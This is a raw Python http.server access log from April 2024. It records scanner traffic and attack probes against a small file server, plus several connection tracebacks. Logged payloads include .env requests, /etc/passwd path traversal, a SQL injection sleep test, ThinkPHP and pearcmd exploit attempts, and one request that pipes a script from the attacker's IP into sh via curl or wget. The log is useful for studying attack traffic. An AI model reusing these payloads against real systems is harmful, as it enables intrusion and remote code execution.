[11/Apr/2024 06:28:01] "POST /wp-admin/admin-ajax.php HTTP/1.1" 501 - 202.26.144.61 - - [11/Apr/2024 06:45:29] "GET / HTTP/1.1" 200 - 202.26.144.61 - - [11/Apr/2024 06:45:29] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [11/Apr/2024 07:11:46] "GET / HTTP/1.1" 200 - 192.241.232.36 - - [11/Apr/2024 07:37:19] code 404, message File not found 192.241.232.36 - - [11/Apr/2024 07:37:19] "GET /portal/redlion HTTP/1.1" 404 - 190.96.1.233 - - [11/Apr/2024 07:39:52] "GET / HTTP/1.1" 200 - 109.205.213.198 - - [11/Apr/2024 08:13:04] "GET / HTTP/1.1" 200 - 138.197.17.191 - - [11/Apr/2024 08:21:26] "GET / HTTP/1.0" 200 - 138.197.17.191 - - [11/Apr/2024 08:29:37] "GET / HTTP/1.1" 200 - 138.197.17.191 - - [11/Apr/2024 08:29:37] code 404, message File not found 138.197.17.191 - - [11/Apr/2024 08:29:37] "GET /favicon.ico HTTP/1.1" 404 - 194.120.230.95 - - [11/Apr/2024 08:51:12] "GET / HTTP/1.1" 200 - 185.150.26.246 - - [11/Apr/2024 09:26:48] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [11/Apr/2024 09:53:12] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [11/Apr/2024 09:53:12] "CONNECT google.com:443 HTTP/1.1" 501 - 146.19.24.28 - - [11/Apr/2024 10:12:58] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [11/Apr/2024 10:22:08] code 501, message Unsupported method ('POST') 185.196.9.61 - - [11/Apr/2024 10:22:08] "POST /wp-admin/admin-ajax.php HTTP/1.1" 501 - 185.150.26.240 - - [11/Apr/2024 10:34:16] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [11/Apr/2024 11:08:56] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [11/Apr/2024 11:19:28] code 404, message File not found 185.196.9.61 - - [11/Apr/2024 11:19:28] "GET /2dvNUDDOkhtZZ5MR8q3P9richaU.txt HTTP/1.1" 404 - 185.196.9.61 - - [11/Apr/2024 11:19:30] code 501, message Unsupported method ('PUT') 185.196.9.61 - - [11/Apr/2024 11:19:30] "PUT /2dvNUDDOkhtZZ5MR8q3P9richaU.txt HTTP/1.1" 501 - 185.196.9.61 - - [11/Apr/2024 11:19:32] code 404, message File not found 185.196.9.61 - - [11/Apr/2024 11:19:32] "GET /2dvNUDDOkhtZZ5MR8q3P9richaU.txt HTTP/1.1" 404 - 185.196.9.61 - - [11/Apr/2024 11:31:57] code 404, message File not found 185.196.9.61 - - [11/Apr/2024 11:31:57] "GET /users/sign_in HTTP/1.1" 404 - 185.242.226.99 - - [11/Apr/2024 12:07:26] "GET / HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('167.94.145.54', 38126) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 167.94.145.54 - - [11/Apr/2024 12:18:55] "GET / HTTP/1.1" 200 - 167.94.145.54 - - [11/Apr/2024 12:19:01] "GET / HTTP/1.1" 200 - 167.94.145.54 - - [11/Apr/2024 12:19:02] code 505, message Invalid HTTP version (2.0) 167.94.145.54 - - [11/Apr/2024 12:19:02] "PRI * HTTP/2.0" 505 - 167.94.145.54 - - [11/Apr/2024 12:19:02] code 404, message File not found 167.94.145.54 - - [11/Apr/2024 12:19:02] "GET /favicon.ico HTTP/1.1" 404 - 185.150.26.240 - - [11/Apr/2024 12:38:59] "GET / HTTP/1.1" 200 - 172.104.11.34 - - [11/Apr/2024 13:07:51] code 400, message Bad request version ('À\\x14À') 172.104.11.34 - - [11/Apr/2024 13:07:51] "\x16\x03\x01\x00\x85\x01\x00\x00\x81\x03\x03\x8b\x1a\x04%÷ú\x88²í.~]xYá\x13ê#TßkcT\x1a\x87ö\x80uý\x17D\x00\x00 À/À0À+À,̨̩À\x13À\x09À\x14À" 400 - 185.180.143.189 - - [11/Apr/2024 13:20:53] code 404, message File not found 185.180.143.189 - - [11/Apr/2024 13:20:53] "GET /zabbix/favicon.ico HTTP/1.1" 404 - 185.180.143.189 - - [11/Apr/2024 13:20:55] code 404, message File not found 185.180.143.189 - - [11/Apr/2024 13:20:55] "GET /favicon.ico HTTP/1.1" 404 - 110.80.136.230 - - [11/Apr/2024 13:21:55] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [11/Apr/2024 13:22:41] "GET / HTTP/1.1" 200 - 78.153.140.177 - - [11/Apr/2024 13:30:21] code 404, message File not found 78.153.140.177 - - [11/Apr/2024 13:30:21] "GET /.env HTTP/1.1" 404 - 78.153.140.177 - - [11/Apr/2024 13:30:22] code 400, message Bad request version ('b\\x0f/oigß\\x06\\x7f{E¬\\x87:Vö\\x99\\x02©-Ųã,\\x8d?ëÆ\\x8eVo\\x08\\x00b\\x13\\x02\\x13\\x03\\x13\\x01À,À0À+À/̨̩\\x00£\\x00\\x9f\\x00¢\\x00\\x9e̪À¯À\\xadÀ$À(À') 78.153.140.177 - - [11/Apr/2024 13:30:22] "\x16\x03\x01\x01H\x01\x00\x01D\x03\x03\x1d)¹¤W\x05dîÛ:5û\x9f>à\x13\x7fïXã\x07\x0e«ñüI³~×\x87£u b\x0f/oigß\x06\x7f{E¬\x87:Vö\x99\x02©-Ųã,\x8d?ëÆ\x8eVo\x08\x00b\x13\x02\x13\x03\x13\x01À,À0À+À/̨̩\x00£\x00\x9f\x00¢\x00\x9e̪À¯À­À$À(À" 400 - 185.196.9.61 - - [11/Apr/2024 13:51:02] code 501, message Unsupported method ('POST') 185.196.9.61 - - [11/Apr/2024 13:51:02] "POST /wp-admin/admin-ajax.php HTTP/1.1" 501 - 64.62.197.41 - - [11/Apr/2024 14:09:24] code 400, message Bad request version ('À\\x14À') 64.62.197.41 - - [11/Apr/2024 14:09:24] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03`\x08UÅZ\x9eÑå*\x84Ch\x99§k(r¹v¤\x0d\x93Ðr\x93\x81W\x15\x9aÖ\x11»\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 138.68.144.239 - - [11/Apr/2024 14:13:27] code 400, message Bad request version ('À\\x14À') 138.68.144.239 - - [11/Apr/2024 14:13:27] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03\x1cü+×`õ9\x96W\x07Ø¡EÕ8³çù8C(3ôt6æ´;_\x9a%ò\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 138.68.144.239 - - [11/Apr/2024 14:13:28] code 400, message Bad HTTP/0.9 request type ("\\x16\\x03\\x01\\x00{\\x01\\x00\\x00w\\x03\\x03'ðl*±¨À¯Ø°\\x9bi\\x19\\x93Ë7z\\\\Y½dZ\\x99Åæ\\x9cãÐ`:\\x0e©\\x00\\x00\\x1aÀ/À+À\\x11À\\x07À\\x13À") 138.68.144.239 - - [11/Apr/2024 14:13:28] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03'ðl*±¨À¯Ø°\x9bi\x19\x93Ë7z\\Y½dZ\x99Åæ\x9cãÐ`:\x0e©\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 138.68.144.239 - - [11/Apr/2024 14:13:28] "GET / HTTP/1.1" 200 - 138.68.144.239 - - [11/Apr/2024 14:13:29] code 404, message File not found 138.68.144.239 - - [11/Apr/2024 14:13:29] "GET /form.html HTTP/1.1" 404 - 138.68.144.239 - - [11/Apr/2024 14:13:29] code 404, message File not found 138.68.144.239 - - [11/Apr/2024 14:13:29] "GET /upl.php HTTP/1.1" 404 - 138.68.144.239 - - [11/Apr/2024 14:13:30] code 400, message Bad request version ('À\\x14À') 138.68.144.239 - - [11/Apr/2024 14:13:30] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03º\x86Ñx$ú§ w\x86X\x9b~\x8f¶×\x8eXÍ\x8d®J\x9eÓâ\x96m._\x13ûoW\x8e>rà\x97Àn³\x18\x04\x00ì\x00\x00hÌ\x14Ì\x13À/À+À0À,À\x11À\x07À'À#À\x13À\x09À(À$À\x14À" 400 - 87.121.69.52 - - [11/Apr/2024 21:17:24] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [11/Apr/2024 21:17:24] "CONNECT google.com:443 HTTP/1.1" 501 - 194.120.230.94 - - [11/Apr/2024 21:28:57] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [11/Apr/2024 21:29:50] "GET / HTTP/1.1" 200 - 185.150.26.246 - - [11/Apr/2024 21:59:23] "GET / HTTP/1.1" 200 - 78.153.140.179 - - [11/Apr/2024 22:11:45] code 400, message Bad request version ('\\x00\\x9eÀ(À$À\\x14À') 78.153.140.179 - - [11/Apr/2024 22:11:45] "\x16\x03\x01\x00Þ\x01\x00\x00Ú\x03\x03"¦\x04¥îÃQg6\x1dw\x9cÆJ»õ#Uï\x1bGp\x15zì_r§ ©1Å\x00\x00nÀ0À,À2À.À/À+À1À-\x00¥\x00£\x00¡\x00\x9f\x00¤\x00¢\x00 \x00\x9eÀ(À$À\x14À" 400 - 78.153.140.179 - - [11/Apr/2024 22:11:45] code 404, message File not found 78.153.140.179 - - [11/Apr/2024 22:11:45] "GET /.env HTTP/1.1" 404 - 194.120.230.95 - - [11/Apr/2024 23:42:26] "GET / HTTP/1.1" 200 - 192.241.226.34 - - [12/Apr/2024 00:03:35] "GET / HTTP/1.1" 200 - 2.186.25.98 - - [12/Apr/2024 00:20:31] "GET / HTTP/1.0" 200 - 220.178.229.142 - - [12/Apr/2024 00:21:35] "GET / HTTP/1.1" 200 - 66.240.192.138 - - [12/Apr/2024 01:02:58] "GET / HTTP/1.1" 200 - 66.240.192.138 - - [12/Apr/2024 01:02:59] code 404, message File not found 66.240.192.138 - - [12/Apr/2024 01:02:59] "GET /robots.txt HTTP/1.1" 404 - 66.240.192.138 - - [12/Apr/2024 01:03:00] code 404, message File not found 66.240.192.138 - - [12/Apr/2024 01:03:00] "GET /sitemap.xml HTTP/1.1" 404 - 66.240.192.138 - - [12/Apr/2024 01:03:00] code 404, message File not found 66.240.192.138 - - [12/Apr/2024 01:03:00] "GET /.well-known/security.txt HTTP/1.1" 404 - 66.240.192.138 - - [12/Apr/2024 01:03:01] code 404, message File not found 66.240.192.138 - - [12/Apr/2024 01:03:01] "GET /favicon.ico HTTP/1.1" 404 - 91.238.181.16 - - [12/Apr/2024 01:03:16] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 91.238.181.16 - - [12/Apr/2024 01:03:16] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 185.196.9.61 - - [12/Apr/2024 01:04:36] code 501, message Unsupported method ('POST') 185.196.9.61 - - [12/Apr/2024 01:04:36] "POST /wp-admin/admin-ajax.php HTTP/1.1" 501 - 167.172.82.151 - - [12/Apr/2024 01:07:36] code 404, message File not found 167.172.82.151 - - [12/Apr/2024 01:07:36] "GET /.env HTTP/1.1" 404 - 167.172.82.151 - - [12/Apr/2024 01:07:36] code 501, message Unsupported method ('POST') 167.172.82.151 - - [12/Apr/2024 01:07:36] "POST / HTTP/1.1" 501 - 35.187.98.121 - - [12/Apr/2024 01:08:02] "GET / HTTP/1.1" 200 - 34.78.39.236 - - [12/Apr/2024 01:19:53] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [12/Apr/2024 01:38:09] code 501, message Unsupported method ('POST') 185.196.9.61 - - [12/Apr/2024 01:38:09] "POST /wp-admin/admin-ajax.php HTTP/1.1" 501 - 185.196.9.61 - - [12/Apr/2024 01:38:12] code 404, message File not found 185.196.9.61 - - [12/Apr/2024 01:38:12] "GET /wp-content/plugins/infographic-and-list-builder-ilist/assets/js/ilist_custom_admin.js HTTP/1.1" 404 - 185.150.26.246 - - [12/Apr/2024 01:38:17] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [12/Apr/2024 01:51:44] code 501, message Unsupported method ('POST') 185.196.9.61 - - [12/Apr/2024 01:51:44] "POST /wp-admin/admin-ajax.php HTTP/1.1" 501 - 185.196.10.155 - - [12/Apr/2024 02:04:56] code 501, message Unsupported method ('POST') 185.196.10.155 - - [12/Apr/2024 02:04:56] "POST /boaform/admin/formLogin HTTP/1.1" 501 - ---------------------------------------- Exception occurred during processing of request from ('198.74.56.46', 44287) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 198.74.56.46 - - [12/Apr/2024 02:15:07] "GET / HTTP/1.1" 200 - 172.104.11.51 - - [12/Apr/2024 02:15:47] "GET / HTTP/1.1" 200 - 195.154.33.76 - - [12/Apr/2024 02:23:28] "GET / HTTP/1.1" 200 - 195.154.33.76 - - [12/Apr/2024 02:23:45] code 404, message File not found 195.154.33.76 - - [12/Apr/2024 02:23:45] "GET /favicon.ico HTTP/1.1" 404 - 195.154.33.76 - - [12/Apr/2024 02:28:15] code 404, message File not found 195.154.33.76 - - [12/Apr/2024 02:28:15] "GET /HNAP1 HTTP/1.1" 404 - 195.154.33.76 - - [12/Apr/2024 02:29:00] code 501, message Unsupported method ('POST') 195.154.33.76 - - [12/Apr/2024 02:29:00] "POST /onvif/device_service HTTP/1.1" 501 - 195.154.33.76 - - [12/Apr/2024 02:29:01] code 404, message File not found 195.154.33.76 - - [12/Apr/2024 02:29:01] "GET /PSIA/index HTTP/1.1" 404 - 185.224.128.43 - - [12/Apr/2024 02:35:16] "GET / HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('167.94.138.122', 53230) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 167.94.138.122 - - [12/Apr/2024 03:22:48] "GET / HTTP/1.1" 200 - 167.94.138.122 - - [12/Apr/2024 03:22:53] "GET / HTTP/1.1" 200 - 167.94.138.122 - - [12/Apr/2024 03:22:54] code 505, message Invalid HTTP version (2.0) 167.94.138.122 - - [12/Apr/2024 03:22:54] "PRI * HTTP/2.0" 505 - 167.94.138.122 - - [12/Apr/2024 03:22:54] code 404, message File not found 167.94.138.122 - - [12/Apr/2024 03:22:54] "GET /favicon.ico HTTP/1.1" 404 - 109.205.213.198 - - [12/Apr/2024 03:52:53] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [12/Apr/2024 04:02:38] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [12/Apr/2024 04:02:38] "CONNECT google.com:443 HTTP/1.1" 501 - 185.196.9.61 - - [12/Apr/2024 04:38:45] code 404, message File not found 185.196.9.61 - - [12/Apr/2024 04:38:45] "GET /wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo HTTP/1.1" 404 - 185.196.9.61 - - [12/Apr/2024 04:47:31] code 501, message Unsupported method ('POST') 185.196.9.61 - - [12/Apr/2024 04:47:31] "POST /wp-admin/admin-ajax.php HTTP/1.1" 501 - 185.196.9.61 - - [12/Apr/2024 04:47:33] code 404, message File not found 185.196.9.61 - - [12/Apr/2024 04:47:33] "GET /wp-content/plugins/documentor-lite/core/js/documentor.js HTTP/1.1" 404 - 168.90.54.172 - - [12/Apr/2024 05:04:19] "GET / HTTP/1.1" 200 - 192.241.238.28 - - [12/Apr/2024 05:07:04] code 400, message Bad request syntax ('MGLNDD_194.193.213.117_80') 192.241.238.28 - - [12/Apr/2024 05:07:04] "MGLNDD_194.193.213.117_80" 400 - 109.205.213.198 - - [12/Apr/2024 05:26:43] "GET / HTTP/1.1" 200 - 205.210.31.212 - - [12/Apr/2024 05:28:07] "GET / HTTP/1.0" 200 - 194.120.230.94 - - [12/Apr/2024 05:52:19] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [12/Apr/2024 06:02:43] "GET / HTTP/1.1" 200 - 185.150.26.246 - - [12/Apr/2024 06:05:54] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [12/Apr/2024 06:06:18] code 501, message Unsupported method ('POST') 185.196.9.61 - - [12/Apr/2024 06:06:18] "POST /wp-admin/admin-ajax.php HTTP/1.1" 501 - 185.224.128.43 - - [12/Apr/2024 07:07:57] "GET / HTTP/1.1" 200 - 83.97.73.245 - - [12/Apr/2024 07:25:00] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 - 194.120.230.95 - - [12/Apr/2024 07:48:51] "GET / HTTP/1.1" 200 - 103.203.57.7 - - [12/Apr/2024 07:56:06] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [12/Apr/2024 08:21:46] code 501, message Unsupported method ('POST') 185.196.9.61 - - [12/Apr/2024 08:21:46] "POST /wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option HTTP/1.1" 501 - 83.97.73.245 - - [12/Apr/2024 08:24:40] code 404, message File not found 83.97.73.245 - - [12/Apr/2024 08:24:40] "GET /actuator/gateway/routes HTTP/1.1" 404 - 185.196.9.61 - - [12/Apr/2024 09:32:43] code 501, message Unsupported method ('POST') 185.196.9.61 - - [12/Apr/2024 09:32:43] "POST /userportal/Controller?mode=8700&operation=1&datagrid=179&json={"%f0%9f%a6%9e":"test"} HTTP/1.1" 501 - 185.196.10.155 - - [12/Apr/2024 09:35:20] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [12/Apr/2024 09:37:07] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [12/Apr/2024 09:37:07] "CONNECT google.com:443 HTTP/1.1" 501 - ---------------------------------------- Exception occurred during processing of request from ('199.45.154.54', 45012) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 199.45.154.54 - - [12/Apr/2024 09:42:42] "GET / HTTP/1.1" 200 - 199.45.154.54 - - [12/Apr/2024 09:42:50] "GET / HTTP/1.1" 200 - 199.45.154.54 - - [12/Apr/2024 09:42:52] code 505, message Invalid HTTP version (2.0) 199.45.154.54 - - [12/Apr/2024 09:42:52] "PRI * HTTP/2.0" 505 - 199.45.154.54 - - [12/Apr/2024 09:42:54] code 404, message File not found 199.45.154.54 - - [12/Apr/2024 09:42:54] "GET /favicon.ico HTTP/1.1" 404 - 45.125.66.34 - - [12/Apr/2024 10:37:16] code 501, message Unsupported method ('CONNECT') 45.125.66.34 - - [12/Apr/2024 10:37:16] "CONNECT google.com:443 HTTP/1.1" 501 - 91.106.75.148 - - [12/Apr/2024 10:53:48] "GET / HTTP/1.1" 200 - 202.26.144.61 - - [12/Apr/2024 11:19:24] "GET / HTTP/1.1" 200 - 109.205.213.198 - - [12/Apr/2024 11:30:54] "GET / HTTP/1.1" 200 - 66.240.205.34 - - [12/Apr/2024 11:35:36] code 400, message Bad request version ('®¯]') 66.240.205.34 - - [12/Apr/2024 11:35:36] "Gh0st­\x00\x00\x00à\x00\x00\x00x\x9cKS``\x98ÃÀÀÀ\x06Ä\x8c@¼Q\x96\x81\x81\x09H\x07§\x16\x95e&§*\x04$&g+\x182\x94ö°00¬¨rc\x00\x01\x11 \x82\x1f\\`&\x83ÇK7\x86\x19ån\x0c9\x95n\x0c;\x84\x0f3¬èsch¨^Ï4'J\x97©\x82ã0Ã\x91h]&\x90øÎ\x97SËA4L?2=áÄ\x92\x86\x0b@õ`\x0cT\x1f®¯]" 400 - 185.196.9.61 - - [12/Apr/2024 12:00:14] code 404, message File not found 185.196.9.61 - - [12/Apr/2024 12:00:14] "GET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1" 404 - 185.224.128.43 - - [12/Apr/2024 12:39:46] "GET / HTTP/1.1" 200 - 80.66.77.235 - - [12/Apr/2024 13:10:29] "GET / HTTP/1.1" 200 - 45.79.128.205 - - [12/Apr/2024 13:18:34] code 400, message Bad request version ('À\\x14À') 45.79.128.205 - - [12/Apr/2024 13:18:34] "\x16\x03\x01\x00\x85\x01\x00\x00\x81\x03\x03ó©Y+'ÙÀ¯¹¾&ÉEÜç\x82õqÙh\x15:\x15\x0c\x90d|=Lp³)\x00\x00 À/À0À+À,̨̩À\x13À\x09À\x14À" 400 - 185.196.9.61 - - [12/Apr/2024 13:38:11] code 404, message File not found 185.196.9.61 - - [12/Apr/2024 13:38:11] "GET /wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\\0 HTTP/1.1" 404 - 193.222.96.163 - - [12/Apr/2024 13:55:52] code 404, message File not found 193.222.96.163 - - [12/Apr/2024 13:55:52] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php HTTP/1.1" 404 - 193.222.96.163 - - [12/Apr/2024 13:55:53] code 404, message File not found 193.222.96.163 - - [12/Apr/2024 13:55:53] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 404 - 193.222.96.163 - - [12/Apr/2024 13:55:55] code 404, message File not found 193.222.96.163 - - [12/Apr/2024 13:55:55] "GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 - 193.222.96.163 - - [12/Apr/2024 13:55:56] code 404, message File not found 193.222.96.163 - - [12/Apr/2024 13:55:56] "GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 - 193.222.96.163 - - [12/Apr/2024 13:55:57] code 404, message File not found 193.222.96.163 - - [12/Apr/2024 13:55:57] "GET /index.php?s=index/index/index/think_lang/../../extend/pearcmd/pearcmd/index&cmd=curl%20http%3A%2F%2F193.222.96.163%2Fqa.sh%20%7C%20sh%20%7C%7C%20wget%20-O-%20http%3A%2F%2F193.222.96.163%2Fqa.sh%20%7C%20sh HTTP/1.1" 404 - 185.196.9.61 - - [12/Apr/2024 14:14:15] code 501, message Unsupported method ('POST') 185.196.9.61 - - [12/Apr/2024 14:14:15] "POST /wp-admin/admin-ajax.php HTTP/1.1" 501 - 185.196.9.61 - - [12/Apr/2024 14:20:10] code 404, message File not found 185.196.9.61 - - [12/Apr/2024 14:20:10] "GET /wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1 HTTP/1.1" 404 - 146.19.24.28 - - [12/Apr/2024 14:32:33] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [12/Apr/2024 14:41:28] code 501, message Unsupported method ('POST') 185.196.9.61 - - [12/Apr/2024 14:41:28] "POST /wp-admin/admin-ajax.php HTTP/1.1" 501 - 185.196.9.61 - - [12/Apr/2024 14:41:30] code 404, message File not found 185.196.9.61 - - [12/Apr/2024 14:41:30] "GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1" 404 - 185.150.26.246 - - [12/Apr/2024 14:48:20] "GET / HTTP/1.1" 200 - 193.106.29.125 - - [12/Apr/2024 15:32:23] "GET / HTTP/1.0" 200 - 64.62.197.81 - - [12/Apr/2024 15:37:43] "GET / HTTP/1.1" 200 - 64.62.197.85 - - [12/Apr/2024 15:40:01] code 404, message File not found 64.62.197.85 - - [12/Apr/2024 15:40:01] "GET /favicon.ico HTTP/1.1" 404 - 64.62.197.91 - - [12/Apr/2024 15:40:43] code 404, message File not found 64.62.197.91 - - [12/Apr/2024 15:40:43] "GET /geoserver/web/ HTTP/1.1" 404 - 87.121.69.52 - - [12/Apr/2024 15:48:09] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [12/Apr/2024 15:48:09] "CONNECT google.com:443 HTTP/1.1" 501 - 185.196.9.61 - - [12/Apr/2024 15:53:38] code 501, message Unsupported method ('POST') 185.196.9.61 - - [12/Apr/2024 15:53:38] "POST /wp-json/am-member/license HTTP/1.1" 501 - 46.174.191.32 - - [12/Apr/2024 16:04:29] "GET / HTTP/1.0" 200 - 185.196.9.61 - - [12/Apr/2024 16:08:17] code 501, message Unsupported method ('POST') 185.196.9.61 - - [12/Apr/2024 16:08:17] "POST /wp-admin/admin-ajax.php HTTP/1.1" 501 - 34.140.108.54 - - [12/Apr/2024 17:57:58] "GET / HTTP/1.1" 200 - 146.148.113.189 - - [12/Apr/2024 17:57:58] "GET / HTTP/1.1" 200 - 146.148.113.189 - - [12/Apr/2024 17:57:59] "GET /ftpscraper.py HTTP/1.1" 200 - 146.148.113.189 - - [12/Apr/2024 17:58:00] "GET /IDR714.T.202312131214.png HTTP/1.1" 200 - 146.148.113.189 - - [12/Apr/2024 17:58:00] "GET /IDR714.T.202401170639.png HTTP/1.1" 200 - 146.148.113.189 - - [12/Apr/2024 17:58:01] "GET /IDR714.T.202401170649.png HTTP/1.1" 200 - 146.148.113.189 - - [12/Apr/2024 17:58:01] "GET /IDR714.T.202404050819.png HTTP/1.1" 200 - 146.148.113.189 - - [12/Apr/2024 17:58:21] "GET /images/ HTTP/1.1" 200 - 146.148.113.189 - - [12/Apr/2024 17:58:25] "GET /scraper-log.txt HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('146.148.113.189', 41606) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 420, in handle_one_request method() File "/usr/lib/python3.11/http/server.py", line 674, in do_GET self.copyfile(f, self.wfile) 146.148.113.189 - - [12/Apr/2024 17:58:25] "GET /server-log.txt HTTP/1.1" 200 - File "/usr/lib/python3.11/http/server.py", line 873, in copyfile shutil.copyfileobj(source, outputfile) File "/usr/lib/python3.11/shutil.py", line 200, in copyfileobj fdst_write(buf) File "/usr/lib/python3.11/socketserver.py", line 834, in write self._sock.sendall(b) BrokenPipeError: [Errno 32] Broken pipe ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('146.148.113.189', 41620) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 420, in handle_one_request method() File "/usr/lib/python3.11/http/server.py", line 674, in do_GET self.copyfile(f, self.wfile) File "/usr/lib/python3.11/http/server.py", line 873, in copyfile shutil.copyfileobj(source, outputfile) File "/usr/lib/python3.11/shutil.py", line 200, in copyfileobj fdst_write(buf) File "/usr/lib/python3.11/socketserver.py", line 834, in write self._sock.sendall(b) ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 146.148.113.189 - - 